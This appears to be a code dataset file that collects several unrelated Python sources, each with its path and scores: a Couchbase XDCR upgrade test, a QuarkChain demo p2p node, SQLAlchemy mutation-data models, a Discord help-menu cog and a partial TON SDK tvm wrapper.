rolelist = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'roles': 'admin'}]
self.log.info("before create_user_source")
RbacBase().create_user_source(testuser, 'builtin', node)
self.log.info("before add_user_role")
RbacBase().add_user_role(rolelist, RestConnection(node), 'builtin')
|
pytests/upgrade/xdcr_upgrade_collections.py
|
import queue
import copy, json
from .newupgradebasetest import NewUpgradeBaseTest
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from couchbase_helper.documentgenerator import BlobGenerator
from membase.api.rest_client import RestConnection, RestHelper
from membase.api.exception import RebalanceFailedException
from membase.helper.cluster_helper import ClusterOperationHelper
from memcached.helper.kvstore import KVStore
from fts.stable_topology_fts import StableTopFTS
from pytests.fts.fts_callable import FTSCallable
from couchbase.cluster import Cluster, PasswordAuthenticator
from security.rbac_base import RbacBase
from threading import Thread
from collection.collections_cli_client import CollectionsCLI
from collection.collections_rest_client import CollectionsRest
from collection.collections_stats import CollectionsStats
class XDCRUpgradeCollectionsTests(NewUpgradeBaseTest):
def setUp(self):
super(XDCRUpgradeCollectionsTests, self).setUp()
self.nodes_init = self.input.param('nodes_init', 2)
self.queue = queue.Queue()
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 1000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "high_doc_ops")
self.instances = self.input.param("instances", 4)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to", False)
self.index_name_prefix = None
self.rest_src = RestConnection(self.servers[0])
def tearDown(self):
super(XDCRUpgradeCollectionsTests, self).tearDown()
def enable_migration_mode(self, src_bucket, dest_bucket):
setting_val_map = {"collectionsMigrationMode": "true",
"colMappingRules": '{"REGEXP_CONTAINS(META().id,\'0$\')":"scope1.mycollection_scope1"}'
}
self.rest_src.set_xdcr_params(src_bucket, dest_bucket, setting_val_map)
def verify_doc_counts(self):
des_master = self.servers[self.nodes_init]
src_cbver = RestConnection(self.master).get_nodes_version()
des_cbver = RestConnection(des_master).get_nodes_version()
src_items = RestConnection(self.master).get_buckets_itemCount()
des_items = RestConnection(des_master).get_buckets_itemCount()
if src_cbver[:3] < "7.0" and des_cbver[:3] >= "7.0":
des_items = self.get_col_item_count(des_master, "default", "_default",
"_default", self.des_stat_col)
if src_items["default"] != des_items:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] < "7.0":
src_items = self.get_col_item_count(self.master, "default", "_default",
"_default", self.stat_col)
if src_items != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items, des_items["default"]))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] >= "7.0":
if src_items["default"] != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items["default"]))
def test_xdcr_upgrade_with_services(self):
after_upgrade_services_in = self.input.param("after_upgrade_services_in", False)
after_upgrade_buckets_in = self.input.param("after_upgrade_buckets_in", False)
after_upgrade_buckets_out = self.input.param("after_upgrade_buckets_out", False)
after_upgrade_buckets_flush = self.input.param("after_upgrade_buckets_flush", False)
# Install initial version on the specified nodes
self._install(self.servers[:self.nodes_init])
# Configure the nodes with services on cluster1
self.operations(self.servers[:self.nodes_init], services="kv,kv")
# get the n1ql node which will be used in pre,during and post upgrade for running n1ql commands
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
# Run the pre upgrade operations, typically creating index
self.pre_upgrade(self.servers[:self.nodes_init])
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
self._install(self.servers[self.nodes_init:self.num_servers])
self.master = self.servers[self.nodes_init]
# Configure the nodes with services on the other cluster2
try:
self.operations(self.servers[self.nodes_init:self.num_servers], services="kv,kv")
self.sleep(timeout=10)
except Exception as ex:
if ex:
print("error: ", str(ex))
self.log.info("bucket is created")
# create a xdcr relationship between cluster1 and cluster2
self.rest_src.add_remote_cluster(self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port,
'Administrator', 'password', "C2")
repl_id = self.rest_src.start_replication('continuous', 'default', "C2")
if repl_id is not None:
self.log.info("Replication created successfully")
# Run the post_upgrade operations
self._create_ephemeral_buckets()
self.post_upgrade(self.servers[:self.nodes_init])
# Add new services after the upgrade
for upgrade_version in self.upgrade_versions:
src_nodes = self.servers[:self.nodes_init]
for server in src_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
src_upgrade_threads = self._async_update(upgrade_version, src_nodes)
for upgrade_thread in src_upgrade_threads:
upgrade_thread.join()
src_success_upgrade = True
while not self.queue.empty():
src_success_upgrade &= self.queue.get()
if not src_success_upgrade:
self.fail("Upgrade failed in source cluster. See logs above!")
else:
self.log.info("Upgrade source cluster success")
des_nodes = self.servers[self.nodes_init:self.num_servers]
self.master = self.servers[self.nodes_init]
for server in des_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
des_upgrade_threads = self._async_update(upgrade_version, des_nodes)
for upgrade_thread in des_upgrade_threads:
upgrade_thread.join()
des_success_upgrade = True
while not self.queue.empty():
des_success_upgrade &= self.queue.get()
if not des_success_upgrade:
self.fail("Upgrade failed in des cluster. See logs above!")
else:
self.log.info("Upgrade des cluster success")
self.master = self.servers[0]
self.rest = RestConnection(self.master)
self.rest_col = CollectionsRest(self.master)
self.cli_col = CollectionsCLI(self.master)
self.stat_col = CollectionsStats(self.master)
self.log.info("Create scope collection at src cluster")
#self.rest_col.create_scope_collection_count()
self._create_scope_collection(self.rest_col, self.cli_col, self.buckets[0].name)
self.sleep(10)
self.des_rest = RestConnection(self.servers[self.nodes_init])
self.des_rest_col = CollectionsRest(self.servers[self.nodes_init])
self.des_cli_col = CollectionsCLI(self.servers[self.nodes_init])
self.des_stat_col = CollectionsStats(self.servers[self.nodes_init])
self.log.info("Create scope collection at des cluster")
self.buckets = RestConnection(self.servers[self.nodes_init]).get_buckets()
self._create_scope_collection(self.des_rest_col, self.des_cli_col, self.buckets[0].name)
self.load_to_collections_bucket()
self.enable_migration = self.input.param("enable_migration", False)
if self.enable_migration:
self.enable_migration_mode(self.buckets[0].name, self.buckets[0].name)
self.verify_doc_counts()
if after_upgrade_buckets_in is not False:
self.bucket_size = 100
self._create_sasl_buckets(self.master, 1)
self._create_standard_buckets(self.master, 1)
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
gen_load = BlobGenerator('upgrade', 'upgrade-', self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", self.expire_time,
flag=self.item_flag)
# deleting buckets after upgrade
if after_upgrade_buckets_out is not False:
self._all_buckets_delete(self.master)
# flushing buckets after upgrade
if after_upgrade_buckets_flush is not False:
self._all_buckets_flush()
def run_view_queries(self):
view_query_thread = Thread(target=self.view_queries, name="run_queries",
args=(self.run_view_query_iterations,))
return view_query_thread
def view_queries(self, iterations):
query = {"connectionTimeout": 60000}
for count in range(iterations):
for i in range(self.view_num):
self.cluster.query_view(self.master, self.ddocs[0].name,
self.default_view_name + str(i), query,
expected_rows=None, bucket="default", retry_time=2)
def create_user(self, node):
self.log.info("inside create_user")
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'password': 'password'}]
rolelist = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'roles': 'admin'}]
self.log.info("before create_user_source")
RbacBase().create_user_source(testuser, 'builtin', node)
self.log.info("before add_user_role")
RbacBase().add_user_role(rolelist, RestConnection(node), 'builtin')
| 0.433022 | 0.128717 |
import argparse
import asyncio
from eth_keys import keys
import signal
from quarkchain.p2p import ecies
from quarkchain.p2p import kademlia
from quarkchain.p2p.cancel_token.token import CancelToken
from quarkchain.p2p.p2p_server import BaseServer
from quarkchain.p2p.tools.paragon import ParagonContext, ParagonPeer, ParagonPeerPool
from quarkchain.utils import Logger
NETWORK_ID = 999
class ParagonServer(BaseServer):
"""
a server using ParagonPeerPool (that creates paragon peers for demonstration purposes)
"""
def _make_peer_pool(self):
return ParagonPeerPool(
privkey=self.privkey,
context=ParagonContext(),
listen_port=self.port,
token=self.cancel_token,
)
def _make_syncer(self):
return
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--bootnodes",
default="enode://c571e0db93d17cc405cb57640826b70588a6a28785f38b21be471c609ca12fcb06cb306ac44872908f5bed99046031a5af82072d484e3ef9029560c1707193a0@127.0.0.1:29000",
type=str,
)
parser.add_argument(
"--privkey",
default="<KEY>",
help="hex string of private key; if empty, will be auto-generated",
type=str,
)
parser.add_argument(
"--listen_port",
default=29000,
help="port for discovery UDP and P2P TCP connection",
type=int,
)
parser.add_argument("--max_peers", default=10, type=int)
parser.add_argument("--logging_level", default="info", type=str)
parser.add_argument(
"--upnp",
default=False,
action="store_true",
help="if set, will automatically set up port-fowarding if upnp devices that support port forwarding can be found",
)
args = parser.parse_args()
Logger.set_logging_level(args.logging_level)
if args.privkey:
privkey = keys.PrivateKey(bytes.fromhex(args.privkey))
else:
privkey = ecies.generate_privkey()
cancel_token = CancelToken("server")
if args.bootnodes:
bootstrap_nodes = args.bootnodes.split(",")
else:
bootstrap_nodes = []
server = ParagonServer(
privkey=privkey,
port=args.listen_port,
network_id=NETWORK_ID,
bootstrap_nodes=tuple(
[kademlia.Node.from_uri(enode) for enode in bootstrap_nodes]
),
token=cancel_token,
upnp=args.upnp,
)
loop = asyncio.get_event_loop()
# loop.set_debug(True)
for sig in [signal.SIGINT, signal.SIGTERM]:
loop.add_signal_handler(sig, cancel_token.trigger)
loop.run_until_complete(server.run())
loop.run_until_complete(server.cancel())
loop.close()
if __name__ == "__main__":
main()
|
quarkchain/p2p/poc/paragon_node.py
|
import argparse
import asyncio
from eth_keys import keys
import signal
from quarkchain.p2p import ecies
from quarkchain.p2p import kademlia
from quarkchain.p2p.cancel_token.token import CancelToken
from quarkchain.p2p.p2p_server import BaseServer
from quarkchain.p2p.tools.paragon import ParagonContext, ParagonPeer, ParagonPeerPool
from quarkchain.utils import Logger
NETWORK_ID = 999
class ParagonServer(BaseServer):
"""
a server using ParagonPeerPool (that creates paragon peers for demonstration purposes)
"""
def _make_peer_pool(self):
return ParagonPeerPool(
privkey=self.privkey,
context=ParagonContext(),
listen_port=self.port,
token=self.cancel_token,
)
def _make_syncer(self):
return
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--bootnodes",
default="enode://c571e0db93d17cc405cb57640826b70588a6a28785f38b21be471c609ca12fcb06cb306ac44872908f5bed99046031a5af82072d484e3ef9029560c1707193a0@127.0.0.1:29000",
type=str,
)
parser.add_argument(
"--privkey",
default="<KEY>",
help="hex string of private key; if empty, will be auto-generated",
type=str,
)
parser.add_argument(
"--listen_port",
default=29000,
help="port for discovery UDP and P2P TCP connection",
type=int,
)
parser.add_argument("--max_peers", default=10, type=int)
parser.add_argument("--logging_level", default="info", type=str)
parser.add_argument(
"--upnp",
default=False,
action="store_true",
help="if set, will automatically set up port-fowarding if upnp devices that support port forwarding can be found",
)
args = parser.parse_args()
Logger.set_logging_level(args.logging_level)
if args.privkey:
privkey = keys.PrivateKey(bytes.fromhex(args.privkey))
else:
privkey = ecies.generate_privkey()
cancel_token = CancelToken("server")
if args.bootnodes:
bootstrap_nodes = args.bootnodes.split(",")
else:
bootstrap_nodes = []
server = ParagonServer(
privkey=privkey,
port=args.listen_port,
network_id=NETWORK_ID,
bootstrap_nodes=tuple(
[kademlia.Node.from_uri(enode) for enode in bootstrap_nodes]
),
token=cancel_token,
upnp=args.upnp,
)
loop = asyncio.get_event_loop()
# loop.set_debug(True)
for sig in [signal.SIGINT, signal.SIGTERM]:
loop.add_signal_handler(sig, cancel_token.trigger)
loop.run_until_complete(server.run())
loop.run_until_complete(server.cancel())
loop.close()
if __name__ == "__main__":
main()
| 0.427277 | 0.114567 |
from SBaaS_base.postgresql_orm_base import *
class data_stage01_resequencing_endpoints(Base):
#TODO: rename to _group
__tablename__ = 'data_stage01_resequencing_endpoints'
id = Column(Integer, Sequence('data_stage01_resequencing_endpoints_id_seq'), primary_key=True)
experiment_id = Column(String(50))
analysis_id = Column(String(500))
sample_name = Column(String(100))
mutation_frequency = Column(Float)
mutation_type = Column(String(3))
mutation_position = Column(Integer)
mutation_data = Column(postgresql.JSON)
isUnique = Column(Boolean)
mutation_annotations = Column(postgresql.ARRAY(String(500)))
mutation_genes = Column(postgresql.ARRAY(String(25)))
mutation_locations = Column(postgresql.ARRAY(String(100)))
mutation_links = Column(postgresql.ARRAY(String(500)))
comment_ = Column(Text)
__table_args__ = (
UniqueConstraint('analysis_id','experiment_id','sample_name','mutation_type','mutation_position'),
)
def __init__(self,
row_dict_I,
):
self.experiment_id=row_dict_I['experiment_id'];
self.analysis_id=row_dict_I['analysis_id'];
self.sample_name=row_dict_I['sample_name'];
self.mutation_frequency=row_dict_I['mutation_frequency'];
self.mutation_type=row_dict_I['mutation_type'];
self.mutation_position=row_dict_I['mutation_position'];
self.mutation_data=row_dict_I['mutation_data'];
self.isUnique=row_dict_I['isUnique'];
self.mutation_annotations=row_dict_I['mutation_annotations'];
self.mutation_genes=row_dict_I['mutation_genes'];
self.mutation_locations=row_dict_I['mutation_locations'];
self.mutation_links=row_dict_I['mutation_links'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self, experiment_id_I,
analysis_id_I,
sample_name_I,
mutation_frequency_I,
mutation_type_I,
mutation_position_I,
mutation_data_I,
isUnique_I,
mutation_annotations_I,
mutation_genes_I,
mutation_locations_I,
mutation_links_I,
comment__I):
self.experiment_id=experiment_id_I
self.analysis_id=analysis_id_I
self.sample_name=sample_name_I
self.mutation_frequency=mutation_frequency_I
self.mutation_type=mutation_type_I
self.mutation_position=mutation_position_I
self.mutation_data=mutation_data_I
self.isUnique=isUnique_I
self.mutation_annotations=mutation_annotations_I
self.mutation_genes=mutation_genes_I
self.mutation_locations=mutation_locations_I
self.mutation_links=mutation_links_I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'experiment_id':self.experiment_id,
'analysis_id':self.analysis_id,
'sample_name':self.sample_name,
'mutation_frequency':self.mutation_frequency,
'mutation_type':self.mutation_type,
'mutation_position':self.mutation_position,
'mutation_data':self.mutation_data,
'isUnique':self.isUnique,
'mutation_annotations':self.mutation_annotations,
'mutation_genes':self.mutation_genes,
'mutation_locations':self.mutation_locations,
'mutation_links':self.mutation_links,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage01_resequencing_endpointLineages(Base):
#TODO: rename to _group
__tablename__ = 'data_stage01_resequencing_endpointLineages'
id = Column(Integer, Sequence('data_stage01_resequencing_endpointLineages_id_seq'), primary_key=True)
experiment_id = Column(String(50))
analysis_id = Column(String(500))
lineage_name = Column(String(100))
mutation_type = Column(String(3))
mutation_position = Column(Integer)
mutation_data = Column(postgresql.JSON)
isUnique = Column(Boolean)
mutation_annotations = Column(postgresql.ARRAY(String(500)))
mutation_genes = Column(postgresql.ARRAY(String(25)))
mutation_locations = Column(postgresql.ARRAY(String(100)))
mutation_links = Column(postgresql.ARRAY(String(500)))
comment_ = Column(Text)
__table_args__ = (
UniqueConstraint('analysis_id','experiment_id','lineage_name','mutation_type','mutation_position'),
)
def __init__(self,
row_dict_I,
):
self.experiment_id=row_dict_I['experiment_id'];
self.analysis_id=row_dict_I['analysis_id'];
self.lineage_name=row_dict_I['lineage_name'];
self.mutation_type=row_dict_I['mutation_type'];
self.mutation_position=row_dict_I['mutation_position'];
self.mutation_data=row_dict_I['mutation_data'];
self.isUnique=row_dict_I['isUnique'];
self.mutation_annotations=row_dict_I['mutation_annotations'];
self.mutation_genes=row_dict_I['mutation_genes'];
self.mutation_locations=row_dict_I['mutation_locations'];
self.mutation_links=row_dict_I['mutation_links'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self, experiment_id_I,
analysis_id_I,
lineage_name_I,
mutation_type_I,
mutation_position_I,
mutation_data_I,
isUnique_I,
mutation_annotations_I,
mutation_genes_I,
mutation_locations_I,
mutation_links_I,
comment__I):
self.experiment_id=experiment_id_I
self.analysis_id=analysis_id_I
self.lineage_name=lineage_name_I
self.mutation_type=mutation_type_I
self.mutation_position=mutation_position_I
self.mutation_data=mutation_data_I
self.isUnique=isUnique_I
self.mutation_annotations=mutation_annotations_I
self.mutation_genes=mutation_genes_I
self.mutation_locations=mutation_locations_I
self.mutation_links=mutation_links_I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'experiment_id':self.experiment_id,
'analysis_id':self.analysis_id,
'lineage_name':self.lineage_name,
'mutation_type':self.mutation_type,
'mutation_position':self.mutation_position,
'mutation_data':self.mutation_data,
'isUnique':self.isUnique,
'mutation_annotations':self.mutation_annotations,
'mutation_genes':self.mutation_genes,
'mutation_locations':self.mutation_locations,
'mutation_links':self.mutation_links,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
|
SBaaS_resequencing/stage01_resequencing_endpoints_postgresql_models.py
|
from SBaaS_base.postgresql_orm_base import *
class data_stage01_resequencing_endpoints(Base):
#TODO: rename to _group
__tablename__ = 'data_stage01_resequencing_endpoints'
id = Column(Integer, Sequence('data_stage01_resequencing_endpoints_id_seq'), primary_key=True)
experiment_id = Column(String(50))
analysis_id = Column(String(500))
sample_name = Column(String(100))
mutation_frequency = Column(Float)
mutation_type = Column(String(3))
mutation_position = Column(Integer)
mutation_data = Column(postgresql.JSON)
isUnique = Column(Boolean)
mutation_annotations = Column(postgresql.ARRAY(String(500)))
mutation_genes = Column(postgresql.ARRAY(String(25)))
mutation_locations = Column(postgresql.ARRAY(String(100)))
mutation_links = Column(postgresql.ARRAY(String(500)))
comment_ = Column(Text)
__table_args__ = (
UniqueConstraint('analysis_id','experiment_id','sample_name','mutation_type','mutation_position'),
)
def __init__(self,
row_dict_I,
):
self.experiment_id=row_dict_I['experiment_id'];
self.analysis_id=row_dict_I['analysis_id'];
self.sample_name=row_dict_I['sample_name'];
self.mutation_frequency=row_dict_I['mutation_frequency'];
self.mutation_type=row_dict_I['mutation_type'];
self.mutation_position=row_dict_I['mutation_position'];
self.mutation_data=row_dict_I['mutation_data'];
self.isUnique=row_dict_I['isUnique'];
self.mutation_annotations=row_dict_I['mutation_annotations'];
self.mutation_genes=row_dict_I['mutation_genes'];
self.mutation_locations=row_dict_I['mutation_locations'];
self.mutation_links=row_dict_I['mutation_links'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self, experiment_id_I,
analysis_id_I,
sample_name_I,
mutation_frequency_I,
mutation_type_I,
mutation_position_I,
mutation_data_I,
isUnique_I,
mutation_annotations_I,
mutation_genes_I,
mutation_locations_I,
mutation_links_I,
comment__I):
self.experiment_id=experiment_id_I
self.analysis_id=analysis_id_I
self.sample_name=sample_name_I
self.mutation_frequency=mutation_frequency_I
self.mutation_type=mutation_type_I
self.mutation_position=mutation_position_I
self.mutation_data=mutation_data_I
self.isUnique=isUnique_I
self.mutation_annotations=mutation_annotations_I
self.mutation_genes=mutation_genes_I
self.mutation_locations=mutation_locations_I
self.mutation_links=mutation_links_I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'experiment_id':self.experiment_id,
'analysis_id':self.analysis_id,
'sample_name':self.sample_name,
'mutation_frequency':self.mutation_frequency,
'mutation_type':self.mutation_type,
'mutation_position':self.mutation_position,
'mutation_data':self.mutation_data,
'isUnique':self.isUnique,
'mutation_annotations':self.mutation_annotations,
'mutation_genes':self.mutation_genes,
'mutation_locations':self.mutation_locations,
'mutation_links':self.mutation_links,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage01_resequencing_endpointLineages(Base):
#TODO: rename to _group
__tablename__ = 'data_stage01_resequencing_endpointLineages'
id = Column(Integer, Sequence('data_stage01_resequencing_endpointLineages_id_seq'), primary_key=True)
experiment_id = Column(String(50))
analysis_id = Column(String(500))
lineage_name = Column(String(100))
mutation_type = Column(String(3))
mutation_position = Column(Integer)
mutation_data = Column(postgresql.JSON)
isUnique = Column(Boolean)
mutation_annotations = Column(postgresql.ARRAY(String(500)))
mutation_genes = Column(postgresql.ARRAY(String(25)))
mutation_locations = Column(postgresql.ARRAY(String(100)))
mutation_links = Column(postgresql.ARRAY(String(500)))
comment_ = Column(Text)
__table_args__ = (
UniqueConstraint('analysis_id','experiment_id','lineage_name','mutation_type','mutation_position'),
)
def __init__(self,
row_dict_I,
):
self.experiment_id=row_dict_I['experiment_id'];
self.analysis_id=row_dict_I['analysis_id'];
self.lineage_name=row_dict_I['lineage_name'];
self.mutation_type=row_dict_I['mutation_type'];
self.mutation_position=row_dict_I['mutation_position'];
self.mutation_data=row_dict_I['mutation_data'];
self.isUnique=row_dict_I['isUnique'];
self.mutation_annotations=row_dict_I['mutation_annotations'];
self.mutation_genes=row_dict_I['mutation_genes'];
self.mutation_locations=row_dict_I['mutation_locations'];
self.mutation_links=row_dict_I['mutation_links'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self, experiment_id_I,
analysis_id_I,
lineage_name_I,
mutation_type_I,
mutation_position_I,
mutation_data_I,
isUnique_I,
mutation_annotations_I,
mutation_genes_I,
mutation_locations_I,
mutation_links_I,
comment__I):
self.experiment_id=experiment_id_I
self.analysis_id=analysis_id_I
self.lineage_name=lineage_name_I
self.mutation_type=mutation_type_I
self.mutation_position=mutation_position_I
self.mutation_data=mutation_data_I
self.isUnique=isUnique_I
self.mutation_annotations=mutation_annotations_I
self.mutation_genes=mutation_genes_I
self.mutation_locations=mutation_locations_I
self.mutation_links=mutation_links_I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'experiment_id':self.experiment_id,
'analysis_id':self.analysis_id,
'lineage_name':self.lineage_name,
'mutation_type':self.mutation_type,
'mutation_position':self.mutation_position,
'mutation_data':self.mutation_data,
'isUnique':self.isUnique,
'mutation_annotations':self.mutation_annotations,
'mutation_genes':self.mutation_genes,
'mutation_locations':self.mutation_locations,
'mutation_links':self.mutation_links,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
| 0.178956 | 0.129733 |
from discord import *
from discord.ext.commands import *
class HelpButtons(ui.View):
def __init__(self):
super().__init__(timeout=None)
@ui.button(label="Home", emoji="<:home_button:918467896592719902>", style=ButtonStyle.red)
async def home(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Home",
description="""
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Utilities", emoji="<:utilities_button:918468783000150016>", style=ButtonStyle.green)
async def utilities(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Utilities",
description="""
`!github`: Check our organization on GitHub.
`![developers|devs]`: Check the list our developers.
`!codehelp`: Check how to ask for help.
`!report`: Report a member to the staff.
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Moderation", emoji="<:mod_button:918474582271356928>", style=ButtonStyle.green)
async def moderation(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Moderation",
description="""
`!lock [#channel] [reason]`: Lock a channel.
`!unlock [#channel] [reason]`: Unlock a channel.
`!kick <@user> [reason]`: Kick a user.
`!ban <@user> [reason]`: Ban a user.
`!mute <@user> [reason]`: Mute a user.
`!unmute <@user>`: Unmute a user.
`!slowmode <seconds>`: Set the slowmode.
`!clear <messages>`: Clear an amount of messages.
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Fun", emoji="<:fun_button:918478578054725632>", style=ButtonStyle.green)
async def fun(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Fun",
description="""
`!meme [subreddit]`: Get a meme from Reddit (add a subreddit name if you want the meme from that subreddit).
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
class Help(Cog):
def __init__(self, client):
self.client = client
@command(aliases=["h"])
async def help(self, ctx):
embed = Embed(
title="Home",
description="""
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await ctx.send(embed=embed, view=HelpButtons())
def setup(client):
client.add_cog(Help(client))
|
cogs/help-command.py
|
from discord import *
from discord.ext.commands import *
class HelpButtons(ui.View):
def __init__(self):
super().__init__(timeout=None)
@ui.button(label="Home", emoji="<:home_button:918467896592719902>", style=ButtonStyle.red)
async def home(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Home",
description="""
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Utilities", emoji="<:utilities_button:918468783000150016>", style=ButtonStyle.green)
async def utilities(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Utilities",
description="""
`!github`: Check our organization on GitHub.
`![developers|devs]`: Check the list our developers.
`!codehelp`: Check how to ask for help.
`!report`: Report a member to the staff.
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Moderation", emoji="<:mod_button:918474582271356928>", style=ButtonStyle.green)
async def moderation(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Moderation",
description="""
`!lock [#channel] [reason]`: Lock a channel.
`!unlock [#channel] [reason]`: Unlock a channel.
`!kick <@user> [reason]`: Kick a user.
`!ban <@user> [reason]`: Ban a user.
`!mute <@user> [reason]`: Mute a user.
`!unmute <@user>`: Unmute a user.
`!slowmode <seconds>`: Set the slowmode.
`!clear <messages>`: Clear an amount of messages.
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
@ui.button(label="Fun", emoji="<:fun_button:918478578054725632>", style=ButtonStyle.green)
async def fun(self, button: ui.Button, interaction: Interaction):
embed = Embed(
title="Fun",
description="""
`!meme [subreddit]`: Get a meme from Reddit (add a subreddit name if you want the meme from that subreddit).
Press the <:home_button:918467896592719902> button to return to the home.
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
""",
color=0x538AEE
)
await interaction.message.edit(content=None, embed=embed)
class Help(Cog):
def __init__(self, client):
self.client = client
@command(aliases=["h"])
async def help(self, ctx):
embed = Embed(
title="Home",
description="""
Press the <:utilities_button:918468783000150016> button to view the utilities commands.
Press the <:mod_button:918474582271356928> button to view the moderation commands.
Press the <:fun_button:918478578054725632> button to view the fun commands.
""",
color=0x538AEE
)
await ctx.send(embed=embed, view=HelpButtons())
def setup(client):
client.add_cog(Help(client))
| 0.648132 | 0.211946 |
from tonclient.decorators import result_as
from tonclient.module import TonModule
from tonclient.types import ParamsOfRunExecutor, ResultOfRunExecutor, \
ParamsOfRunTvm, ResultOfRunTvm, ParamsOfRunGet, ResultOfRunGet
class TonTvm(TonModule):
""" Free TON tvm SDK API implementation """
@result_as(classname=ResultOfRunGet)
def run_get(self, params: ParamsOfRunGet) -> ResultOfRunGet:
"""
Executes a get method of FIFT contract.
Executes a get method of FIFT contract that fulfills the
smc-guidelines https://test.ton.org/smc-guidelines.txt and returns
the result data from TVM's stack
:param params: See `types.ParamsOfRunGet`
:return: See `types.ResultOfRunGet`
"""
return self.request(method='tvm.run_get', **params.dict)
@result_as(classname=ResultOfRunExecutor)
def run_executor(
self, params: ParamsOfRunExecutor) -> ResultOfRunExecutor:
"""
Emulates all the phases of contract execution locally.
Performs all the phases of contract execution on Transaction Executor -
the same component that is used on Validator Nodes.
Can be used for contract debugging, to find out the reason why a
message was not delivered successfully. Validators throw away the
failed external inbound messages (if they failed before `ACCEPT`) in
the real network. This is why these messages are impossible to debug
in the real network. With the help of run_executor you can do that.
In fact, `process_message` function performs local check with
`run_executor` if there was no transaction as a result of processing
and returns the error, if there is one.
Another use case to use `run_executor` is to estimate fees for message
execution. Set `AccountForExecutor::Account.unlimited_balance` to
`true` so that emulation will not depend on the actual balance.
This may be needed to calculate deploy fees for an account that does
not exist yet. JSON with fees is in `fees` field of the result.
One more use case - you can produce the sequence of operations,
thus emulating the sequential contract calls locally. And so on.
Transaction executor requires account BOC (bag of cells) as a
parameter. To get the account BOC - use `net.query` method to download
it from GraphQL API (field `boc` of `account`) or generate it with
`abi.encode_account method`.
Also it requires message BOC. To get the message BOC - use
`abi.encode_message` or `abi.encode_internal_message`.
If you need this emulation to be as precise as possible
(for instance - emulate transaction with particular lt in particular
block or use particular blockchain config, downloaded from a
particular key block - then specify `execution_options` parameter.
If you need to see the aborted transaction as a result, not as an
error, set `skip_transaction_check` to true.
:param params: See `types.ParamsOfRunExecutor`
:return: `types.ResultOfRunExecutor`
"""
return self.request(method='tvm.run_executor', **params.dict)
@result_as(classname=ResultOfRunTvm)
